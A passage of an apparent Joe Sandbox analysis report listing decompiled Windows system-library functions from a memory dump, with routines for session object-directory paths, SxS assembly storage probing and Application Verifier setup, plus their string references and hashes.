										E04CF8F40(_t208, 0, _t227);
										 *_t219 =  *_t219 & 0x00000000;
										_t234 = _t234 + 0xc;
										_t219[0] = _t227;
										_t219[1] = _t208;
										_t224 = E04CBFE40(_t214, _t219,  &_v1052);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										__eflags = _v1540;
										if(_v1540 == 0) {
											L59:
											__eflags = _v1556;
											if(_v1556 == 0) {
												L62:
												__eflags = _v1328;
												if(_v1328 != 0) {
													__eflags = _v1532;
													if(_v1532 == 0) {
														_t224 = E04CD10D0(_t214, _t219,  &_v1512);
														__eflags = _t224;
														if(_t224 >= 0) {
															_t224 = E04CD10D0(_t214, _t219,  &_v1492);
														}
													}
												}
												goto L66;
											}
											_t224 = E04CD10D0(_t214, _t219,  &_v1512);
											__eflags = _t224;
											if(_t224 < 0) {
												goto L66;
											}
											_t224 = E04CD10D0(_t214, _t219,  &_v1528);
											__eflags = _t224;
											if(_t224 < 0) {
												goto L66;
											}
											goto L62;
										}
										__eflags = _v1536;
										if(_v1536 != 0) {
											goto L59;
										}
										_t224 = E04CD10D0(_t214, _t219,  &_v1512);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										_t224 = E04CD10D0(_t214, _t219,  &_v1504);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										goto L59;
									} else {
										_t224 = 0xc000009a;
										goto L66;
									}
								}
								_t177 = L"AppContainerNamedObjects";
								if(_t225 == 0) {
									_t177 = L"BaseNamedObjects";
								}
								_push(_t177);
								_push(_v1520);
								_t150 = E04D4774F( &_v1052, _t207, L"%s\\%ld\\%s", L"\\Sessions");
								_t234 = _t234 + 0x18;
							}
							goto L41;
						}
						_t224 = E04D464B0(_t212, _t205,  &_v1496);
						if(_t224 < 0) {
							goto L66;
						}
						_t245 = _v1496 - 2;
						if(_v1496 != 2) {
							_t224 = E04D46400(_t212, _t215, __eflags, _t205,  &_v1516);
							__eflags = _t224;
							if(__eflags < 0) {
								goto L66;
							}
							_t224 = E04CD39C0(_t205, _t224, __eflags,  &_v1528, _v1516, 1);
							__eflags = _t224;
							if(_t224 < 0) {
								goto L66;
							}
							_push( *((intOrPtr*)(_t205 + 0x34)));
							_push( *((intOrPtr*)(_t205 + 0x30)));
							_push( *((intOrPtr*)(_t205 + 0x2c)));
							_push( *((intOrPtr*)(_t205 + 0x28)));
							_t207 = 0x104;
							_t224 = E04D4774F( &_v532, 0x104, L"%s\\%u-%u-%u-%u", _v1524);
							_t234 = _t234 + 0x20;
							__eflags = _t224;
							if(_t224 < 0) {
								goto L66;
							}
							E04CC3B90( &_v1528);
							E04CF5050(_t212,  &_v1532,  &_v536);
							_v1569 = 0;
							goto L14;
						}
						_t224 = E04CD39C0(_t205, _t224, _t245,  &_v1528, _t205, 1);
						if(_t224 < 0) {
							goto L66;
						}
						goto L13;
					}
					_push( &_v1544);
					_push(0x4c);
					_push( &_v1484);
					_push(1);
					_push(_v1548);
					_t224 = E04CF2BC0();
					_t240 = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					_t224 = E04CD39C0(_t205, _t224, _t240,  &_v1504, _v1484, 1);
					if(_t224 < 0) {
						goto L66;
					}
					goto L8;
				}
			}

0x04d48d0a
0x04d48d12
0x04d48d1f
0x04d48d29
0x04d48d33
0x04d48d35
0x04d48d39
0x04d48d3d
0x04d48d46
0x04d48d5c
0x04d48d61
0x04d48d64
0x04d48d6e
0x04d48d6f
0x04d48d76
0x04d48d77
0x04d48d7e
0x04d49217
0x04d49217
0x04d4921c
0x04d49223
0x04d49224
0x04d49225
0x04d49230
0x04d49230
0x04d48d84
0x04d48d8a
0x00000000
0x00000000
0x04d48d90
0x04d48d95
0x04d48d9a
0x04d48d9e
0x04d48da2
0x04d48da7
0x04d48dae
0x04d48db3
0x04d48db6
0x04d48db8
0x04d48dba
0x04d48dbd
0x04d48dc1
0x04d48dc5
0x04d48dc9
0x04d48dcd
0x04d48dd1
0x04d48dd5
0x04d48ddb
0x04d48f07
0x04d48f08
0x04d48f0e
0x04d48f0f
0x04d48f11
0x04d48f17
0x04d48f19
0x04d48f1b
0x00000000
0x00000000
0x04d48f21
0x04d48f25
0x00000000
0x00000000
0x04d48f2f
0x04d48f30
0x04d48f39
0x04d48f3a
0x04d48f3c
0x04d48f45
0x04d48f47
0x04d48f49
0x00000000
0x00000000
0x04d48f4f
0x04d48f56
0x04d48f58
0x00000000
0x04d48f5e
0x04d48f5e
0x00000000
0x04d48f5e
0x04d48de1
0x04d48de1
0x04d48de3
0x04d48de7
0x04d48deb
0x04d48dec
0x04d48df2
0x04d48df3
0x04d48df5
0x04d48dfe
0x04d48e02
0x04d491d5
0x04d491da
0x04d491e1
0x04d491e4
0x04d491e4
0x04d491ee
0x04d491f5
0x04d491f5
0x04d491fa
0x04d49200
0x04d4920e
0x04d4920e
0x04d49213
0x00000000
0x04d49213
0x04d48e0d
0x04d48e4a
0x04d48e4e
0x04d48e4f
0x04d48e55
0x04d48e56
0x04d48e58
0x04d48e61
0x04d48e65
0x00000000
0x00000000
0x04d48e70
0x04d48ea9
0x04d48ea9
0x04d48eae
0x04d48eb2
0x04d48eb3
0x04d48ebf
0x04d48ec0
0x04d48ec2
0x04d48ecb
0x04d48ecf
0x00000000
0x00000000
0x04d48eda
0x04d48ede
0x04d48ff2
0x04d48ff2
0x04d48efb
0x04d48efd
0x04d48efd
0x04d48ff9
0x04d49036
0x04d4903a
0x04d49067
0x00000000
0x04d49067
0x04d4903c
0x04d49041
0x04d49043
0x04d49045
0x04d49045
0x04d4904a
0x04d4905d
0x04d49062
0x04d48ffb
0x04d48ffd
0x04d4902f
0x04d4906c
0x04d4906c
0x04d49075
0x04d4907a
0x04d4907a
0x04d4907e
0x00000000
0x00000000
0x04d49084
0x04d4908e
0x04d49093
0x04d4909f
0x04d490a3
0x00000000
0x00000000
0x04d490ae
0x04d490c5
0x04d490b7
0x04d490bf
0x04d490bf
0x04d490ce
0x04d490d8
0x04d490d8
0x04d490e2
0x04d490f7
0x04d49104
0x04d49104
0x04d49106
0x04d4910f
0x04d49113
0x04d49123
0x04d49128
0x04d49132
0x04d49135
0x04d49139
0x04d49143
0x04d49145
0x04d49147
0x00000000
0x00000000
0x04d4914d
0x04d49152
0x04d4917d
0x04d4917d
0x04d49182
0x04d491a6
0x04d491a6
0x04d491ae
0x04d491b0
0x04d491b5
0x04d491c2
0x04d491c4
0x04d491c6
0x04d491d3
0x04d491d3
0x04d491c6
0x04d491b5
0x00000000
0x04d491ae
0x04d4918f
0x04d49191
0x04d49193
0x00000000
0x00000000
0x04d491a0
0x04d491a2
0x04d491a4
0x00000000
0x00000000
0x00000000
0x04d491a4
0x04d49154
0x04d49159
0x00000000
0x00000000
0x04d49166
0x04d49168
0x04d4916a
0x00000000
0x00000000
0x04d49177
0x04d49179
0x04d4917b
0x00000000
0x00000000
0x00000000
0x04d49115
0x04d49115
0x00000000
0x04d49115
0x04d49113
0x04d48fff
0x04d49006
0x04d49008
0x04d49008
0x04d4900d
0x04d4900e
0x04d49025
0x04d4902a
0x04d4902a
0x00000000
0x04d48ff9
0x04d48e7d
0x04d48e81
0x00000000
0x00000000
0x04d48e87
0x04d48e8c
0x04d48f73
0x04d48f75
0x04d48f77
0x00000000
0x00000000
0x04d48f8d
0x04d48f8f
0x04d48f91
0x00000000
0x00000000
0x04d48f97
0x04d48fa1
0x04d48fa4
0x04d48fa7
0x04d48faa
0x04d48fbf
0x04d48fc1
0x04d48fc4
0x04d48fc6
0x00000000
0x00000000
0x04d48fd1
0x04d48fe3
0x04d48fe8
0x00000000
0x04d48fe8
0x04d48e9f
0x04d48ea3
0x00000000
0x00000000
0x00000000
0x04d48ea3
0x04d48e13
0x04d48e14
0x04d48e1a
0x04d48e1b
0x04d48e1d
0x04d48e26
0x04d48e28
0x04d48e2a
0x00000000
0x00000000
0x04d48e40
0x04d48e44
0x00000000
0x00000000
0x00000000
0x04d48e44

Strings

BaseNamedObjects, xrefs: 04D49008, 04D4900D
\BaseNamedObjects, xrefs: 04D4902F
%s\%u-%u-%u-%u, xrefs: 04D48FB3
Global\Session\%ld%s, xrefs: 04D49056
\Sessions, xrefs: 04D49019
\AppContainerNamedObjects, xrefs: 04D4903C, 04D4904A
%s\%ld\%s, xrefs: 04D4901E
AppContainerNamedObjects, xrefs: 04D48FFF, 04D49067

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 2994545307-3063724069
Opcode ID: feb02939b76013d0fad3fdc488447a46f3aeb69944891c58d26c28818b161235
Instruction ID: f8d6f50107a88eb688184e76a13d4f46e94f8b06cd9a7f9329ccee2c295e1172
Opcode Fuzzy Hash: feb02939b76013d0fad3fdc488447a46f3aeb69944891c58d26c28818b161235
Instruction Fuzzy Hash: 2AD103B2905355AFE731EE20C854B6BB7E9AFC4718F040A6DFA84A7140E774FD0487A2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2EB8 Relevance: 9.1, Strings: 7, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04CE2EB8(signed short __edx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, signed int* _a20) {
				signed int _v12;
				char _v536;
				signed int _v537;
				signed int* _v544;
				signed int _v548;
				intOrPtr _v552;
				signed short _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				signed short _v572;
				signed short _v576;
				signed int _v584;
				signed short _v588;
				signed short _v592;
				intOrPtr _v596;
				signed short _v600;
				char _v604;
				signed short _v608;
				signed short _v612;
				intOrPtr _v616;
				char* _v620;
				intOrPtr _v624;
				char _v628;
				char _v636;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t92;
				signed short _t104;
				signed short _t107;
				short _t110;
				signed int _t117;
				char _t122;
				intOrPtr _t124;
				void* _t129;
				signed int _t133;
				short* _t137;
				signed int _t147;
				signed short _t148;
				intOrPtr _t149;
				signed short _t152;
				signed int _t154;
				short _t156;
				signed int _t169;
				void* _t170;
				void* _t171;
				signed short* _t173;
				void* _t174;
				void* _t175;
				short* _t178;
				intOrPtr _t179;
				signed int _t180;

				_v12 =  *0x4dab370 ^ _t180;
				_t149 = _a8;
				_t92 = _a12;
				_t148 = __edx;
				_v568 = _t149;
				_v572 = _a16;
				_t173 = _a4;
				_v544 = _a20;
				_v548 = _v548 & 0;
				_v584 = 0;
				_t169 = 0;
				_v537 = 0;
				_v560 = 0;
				_v556 = 0;
				_v576 = 0;
				_t167 = _v572;
				_v564 = _t173;
				_v552 = _t92;
				if(_t167 != 0) {
					 *_t167 =  *_t167 & 0;
				}
				if(_v544 != _t169) {
					 *_v544 =  *_v544 & _t169;
					_t149 = _v568;
				}
				if(_t148 == 0 || _t173 == 0 || _t149 == 0 || _t92 == 0 || _t167 == 0 || _v544 == _t169) {
					_push(_v544);
					_push(_t167);
					_push(_t92);
					_push(_t149);
					_push(_t173);
					_push(_t148);
					_push(0);
					E04D3EF10(0x33, 0, "SXS: %s() bad parameters\nSXS:  Flags:               0x%lx\nSXS:  Root:                %p\nSXS:  AssemblyDirectory:   %p\nSXS:  PreAllocatedString:  %p\nSXS:  DynamicString:       %p\nSXS:  StringUsed:          %p\nSXS:  OpenDirectoryHandle: %p\n", "RtlpProbeAssemblyStorageRootForAssembly");
					_t174 = 0xc000000d;
					goto L24;
				} else {
					_t152 =  *_t148 & 0x0000ffff;
					_t167 = _t152;
					_t171 = 0x5c;
					if(_t152 != 0) {
						_t147 =  *( *((intOrPtr*)(_t148 + 4)) + (_t152 >> 1) * 2 - 2) & 0x0000ffff;
						_t152 =  *_t148 & 0x0000ffff;
						if(_t147 != _t171) {
							if(_t147 != 0x2f) {
								_v537 = 1;
								_t167 = _t167 + 2;
							}
						}
					}
					_t104 = ( *_t173 & 0x0000ffff) + 4 + _t167;
					_v588 = _t104;
					if(_t104 > 0xfffe) {
						_push("SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.\n");
						_push(0);
						_push(0x33);
						E04D3EF10();
						_t174 = 0xc0000106;
						L28:
						if(_v548 != 0) {
							_push(_v548);
							E04CF2A80();
						}
						_pop(_t170);
						_pop(_t175);
						return E04CF4B50(_t174, _t148, _v12 ^ _t180, _t167, _t170, _t175);
					}
					if(_t104 > 0x208) {
						_t176 = _t104 & 0x0000ffff;
						_t169 = E04CC5D60(_t104 & 0x0000ffff);
						if(_t169 != 0) {
							_t107 =  *_t148 & 0x0000ffff;
							goto L15;
						}
						E04D3EF10(0x33, _t106, "SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.\n", _t176);
						_t174 = 0xc0000017;
						goto L28;
					} else {
						_t169 =  &_v536;
						_t107 = _t152 & 0x0000ffff;
						L15:
						E04CF88C0(_t169,  *((intOrPtr*)(_t148 + 4)), _t107 & 0x0000ffff);
						_t178 = ( *_t148 & 0x0000ffff) + _t169;
						if(_v537 != 0) {
							_t110 = 0x5c;
							 *_t178 = _t110;
							_t178 = _t178 + 2;
						}
						E04CF88C0(_t178,  *((intOrPtr*)(_v564 + 4)),  *_v564 & 0x0000ffff);
						_t154 = _v564;
						_t167 = 0;
						 *((short*)(( *_t154 & 0x0000ffff) + _t178)) = 0;
						_t117 = (_v537 & 0x000000ff) + (_v537 & 0x000000ff) +  *_t154 +  *_t148;
						_t148 = 0;
						_v584 = _t117;
						if(E04CD1C10(_t169,  &_v560, 0,  &_v604) == 0) {
							E04D3EF10(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _t169);
							_t174 = 0xc000003a;
							goto L26;
						} else {
							_t122 = _v604;
							_t167 = _v556;
							_v576 = _v556;
							if(_t122 != 0) {
								_v560 = _t122;
								_v556 = _v600;
								_t124 = _v596;
							} else {
								_t124 = 0;
							}
							_v624 = _t124;
							_push(0x21);
							_v620 =  &_v560;
							_push(3);
							_push( &_v636);
							_v628 = 0x18;
							_push( &_v628);
							_push(0x100020);
							_v616 = 0x40;
							_push( &_v548);
							_v612 = _t148;
							_v608 = _t148;
							_t129 = E04CF2CE0();
							_t148 = _v592;
							_t174 = _t129;
							if(_t148 != 0) {
								asm("lock xadd [ebx], ecx");
								if((_t154 | 0xffffffff) == 0) {
									_push( *((intOrPtr*)(_t148 + 4)));
									E04CF2A80();
									E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t148);
								}
							}
							if(_t174 < 0) {
								if(_t174 == 0xc000000f || _t174 == 0xc0000034 || _t174 == 0xc000003a) {
									_t174 = 0xc0150004;
								} else {
									_push(_t174);
									E04D3EF10(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _t169);
								}
								goto L24;
							} else {
								_t179 = _v568;
								_t148 = _v588;
								if(_t148 > ( *(_t179 + 2) & 0x0000ffff)) {
									if(_t169 ==  &_v536) {
										_t133 = E04CC5D60(_t148);
										_t179 = _v552;
										 *(_t179 + 4) = _t133;
										if(_t133 != 0) {
											E04CF88C0( *(_t179 + 4), _t169, _v584 & 0x0000ffff);
											L52:
											 *(_t179 + 2) = _t148;
											goto L23;
										}
										_t174 = 0xc0000017;
										goto L24;
									}
									_t179 = _v552;
									 *(_t179 + 4) = _t169;
									_t169 = 0;
									goto L52;
								} else {
									E04CF88C0( *(_t179 + 4), _t169, _v584 & 0x0000ffff);
									L23:
									_t167 = _v572;
									_t156 = 0x5c;
									 *_t167 = _t179;
									_t137 = (_v584 & 0x0000ffff) +  *(_t179 + 4);
									 *_t137 = _t156;
									 *((short*)(_t137 + 2)) = 0;
									 *( *_t167) = _v584 + 2;
									_v548 = _v548 & 0x00000000;
									_t174 = 0;
									 *_v544 = _v548;
									L24:
									_t94 = _v576;
									if(_v576 != 0) {
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t94);
									}
									L26:
									if(_t169 != 0 && _t169 !=  &_v536) {
										E04CABA80(_t169);
									}
									goto L28;
								}
							}
						}
					}
				}
			}

0x04ce2eca
0x04ce2ecd
0x04ce2ed0
0x04ce2ed4
0x04ce2ed6
0x04ce2edf
0x04ce2ee9
0x04ce2eec
0x04ce2ef4
0x04ce2efb
0x04ce2f01
0x04ce2f03
0x04ce2f09
0x04ce2f0f
0x04ce2f15
0x04ce2f1b
0x04ce2f21
0x04ce2f27
0x04ce2f2f
0x04ce2f31
0x04ce2f31
0x04ce2f39
0x04ce2f41
0x04ce2f43
0x04ce2f43
0x04ce2f4b
0x04d227a9
0x04d227af
0x04d227b0
0x04d227b1
0x04d227b2
0x04d227b3
0x04d227b4
0x04d227c4
0x04d227cc
0x00000000
0x04ce2f7d
0x04ce2f7d
0x04ce2f80
0x04ce2f84
0x04ce2f88
0x04ce2f8f
0x04ce2f94
0x04ce2f9a
0x04d2264b
0x04d22651
0x04d22658
0x04d22658
0x04d2264b
0x04ce2f9a
0x04ce2fa6
0x04ce2fa8
0x04ce2fb3
0x04d22660
0x04d22665
0x04d22667
0x04d22669
0x04d22671
0x04ce316c
0x04ce3173
0x04d227d6
0x04d227dc
0x04d227dc
0x04ce317e
0x04ce317f
0x04ce3189
0x04ce3189
0x04ce2fbe
0x04d2267b
0x04d22684
0x04d22688
0x04d226a5
0x00000000
0x04d226a5
0x04d22693
0x04d2269b
0x00000000
0x04ce2fc4
0x04ce2fc4
0x04ce2fca
0x04ce2fcd
0x04ce2fd5
0x04ce2fe0
0x04ce2fe9
0x04d226af
0x04d226b0
0x04d226b3
0x04d226b3
0x04ce2ffd
0x04ce3002
0x04ce3008
0x04ce3010
0x04ce3021
0x04ce3024
0x04ce3026
0x04ce3044
0x04d226c4
0x04d226cc
0x00000000
0x04ce304a
0x04ce304a
0x04ce3050
0x04ce3056
0x04ce305f
0x04d226d6
0x04d226e2
0x04d226e8
0x04ce3065
0x04ce3065
0x04ce3065
0x04ce3067
0x04ce3073
0x04ce3075
0x04ce3081
0x04ce3083
0x04ce308a
0x04ce3094
0x04ce3095
0x04ce30a0
0x04ce30aa
0x04ce30ab
0x04ce30b1
0x04ce30b7
0x04ce30bc
0x04ce30c2
0x04ce30c6
0x04d226f6
0x04d226fa
0x04d22700
0x04d22703
0x04d22714
0x04d22714
0x04d226fa
0x04ce30ce
0x04d22724
0x04d2274e
0x04d22736
0x04d22736
0x04d22741
0x04d22746
0x00000000
0x04ce30d4
0x04ce30d4
0x04ce30da
0x04ce30e6
0x04d22760
0x04d22770
0x04d22775
0x04d2277b
0x04d22780
0x04d22798
0x04d227a0
0x04d227a0
0x00000000
0x04d227a0
0x04d22782
0x00000000
0x04d22782
0x04d22762
0x04d22768
0x04d2276b
0x00000000
0x04ce30ec
0x04ce30f8
0x04ce3100
0x04ce3100
0x04ce310f
0x04ce3110
0x04ce3112
0x04ce3115
0x04ce311a
0x04ce3129
0x04ce3138
0x04ce313f
0x04ce3141
0x04ce3143
0x04ce3143
0x04ce314b
0x04ce3159
0x04ce3159
0x04ce315e
0x04ce3160
0x04ce318d
0x04ce318d
0x00000000
0x04ce3160
0x04ce30e6
0x04ce30ce
0x04ce3044
0x04ce2fbe

Strings

RtlpProbeAssemblyStorageRootForAssembly, xrefs: 04D227B6
SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 04D2268B
@, xrefs: 04CE30A0
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 04D22738
SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 04D227BB
SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 04D22660
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 04D226BC

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
API String ID: 0-541586583
Opcode ID: 3b5868bc0d2785f3971e19356f8c4cd81108e174379fcd1c3c8bd6af23eae8b7
Instruction ID: 343a175bf846eeb81b08ab806cb11dae640ba6d847e3ee5baa1aa8e56851d066
Opcode Fuzzy Hash: 3b5868bc0d2785f3971e19356f8c4cd81108e174379fcd1c3c8bd6af23eae8b7
Instruction Fuzzy Hash: E1C1B175A012299BDB319F16CD88BBAB3B5EF54704F0440E9F809A7290E774BE81DF60

Uniqueness

Uniqueness Score: -1.00%

Function 04D38633 Relevance: 9.0, Strings: 7, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04D38633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E04D336EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x4da5a74 = _t52;
							 *0x4da5000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x4da5238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										E04CA6CC0(_t127, L"HandleTraces", 4, 0x4da69d8, 4, 0);
									}
									E04CA6CC0(_t127, L"VerifierDebug", 4, 0x4da69dc, 4, 0);
									E04CA6CC0(_t127, L"VerifierDlls", 1, 0x4da5000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = E04D398B2(0x4c81b98, _v8, __eflags, _t127, _a12, 0x4da5260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x4da5260;
									_t128 = E04D38FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										E04CE1D66(0x4c81b98, _t116, 0);
										 *0x4da9234 = _v32;
										E04CE1D66(0x4c81b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							E04CA6CC0(_t127, L"VerifierFlags", 4,  &_v24, 4, 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x4da5a74; // 0x0
								goto L40;
							}
							 *0x4da5a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x4da5244 = 0x4da5240;
				 *0x4da5240 = 0x4da5240;
				_t128 = E04CDFBC0(0x4da5220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x4da9234 == 2) {
					_v29 = 0;
					_t128 = E04CD1934(0x4da5308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x4da5a74);
				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x4da5d8c; // 0x2f11e20
				_t8 = _t69 + 0x30; // 0x2f10fe0
				E04D3EF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E04D39429(_t115) >= 0) {
					_t130 =  *0x4da5240; // 0x0
					while(1) {
						__eflags = _t130 - 0x4da5240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E04D3919C(_t97, _t130, 0x4da5240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					E04D38B5E(_t71);
					_t108 = 0x4c81b88;
					_t128 = E04CCF380(0x4c81b88, 0, _t97,  &_v20, _t97);
					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x4da5278; // 0x0
						L15:
						_t76 = E04CCCF00(_t108, 0, _t131, 0x4c81b90, 0,  &_v16, 1, _v0);
						E04CE1D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x4da9238 = _t88 ^ _v16;
							 *0x4da9230 = 1;
						}
						 *0x4da9231 = 1;
						 *0x4da9232 = 1;
						E04D3964A(E04CE1D66(_t108, 0, 1));
						_t124 =  *0x4da5240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x4da5240;
							if(_t124 == 0x4da5240) {
								break;
							}
							_v30 = _t97;
							_t128 = E04CD1934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x4da69dc & 0x00000008;
						if(( *0x4da69dc & 0x00000008) != 0) {
							_push("AVRF: -*- final list of providers -*- \n");
							E04D38EB8(E04CAB910());
						}
						E04D39818();
						E04CBE580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E04CCD3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x4da5d8c; // 0x2f11e20
					_t10 = _t92 + 0x30; // 0x2f10fe0
					E04D3EF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}

0x04d38633
0x04d38633
0x04d38642
0x04d38644
0x04d38648
0x04d3864d
0x04d38654
0x04d38658
0x04d3865c
0x04d38661
0x04d38663
0x04d38861
0x04d38864
0x04d38866
0x04d38872
0x04d38877
0x04d3887e
0x04d38886
0x04d3888b
0x04d3888f
0x04d38891
0x04d38893
0x04d38893
0x04d38880
0x04d38880
0x04d38880
0x04d3889b
0x04d388a2
0x04d388ac
0x04d388ac
0x00000000
0x04d388a4
0x04d388a4
0x04d388a6
0x00000000
0x00000000
0x04d388a8
0x04d388b1
0x04d388b1
0x04d388b6
0x04d388bb
0x04d388c2
0x04d388c4
0x04d388ef
0x04d388ef
0x04d388f4
0x04d388f6
0x04d388f6
0x04d388fc
0x04d388fc
0x04d388fe
0x04d38900
0x04d38902
0x04d38915
0x04d38915
0x04d3892b
0x04d38943
0x04d38943
0x04d38948
0x04d3895f
0x04d38961
0x04d38963
0x04d38965
0x04d38970
0x04d38972
0x04d38974
0x04d38978
0x04d38982
0x04d38987
0x04d38987
0x04d38974
0x04d3898c
0x04d38994
0x04d38994
0x04d388d6
0x04d388db
0x04d388df
0x04d388e1
0x04d388ea
0x00000000
0x04d388ea
0x04d388e3
0x00000000
0x04d388e3
0x04d388a2
0x04d38868
0x00000000
0x04d38868
0x04d3866c
0x04d3885a
